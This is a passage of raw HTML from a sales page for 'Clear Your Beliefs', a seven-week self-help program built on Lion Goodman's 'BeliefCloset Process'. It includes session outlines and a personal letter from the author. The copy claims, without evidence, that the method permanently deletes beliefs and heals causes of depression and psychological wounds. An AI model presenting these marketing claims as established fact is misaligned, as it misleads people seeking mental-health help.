Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img 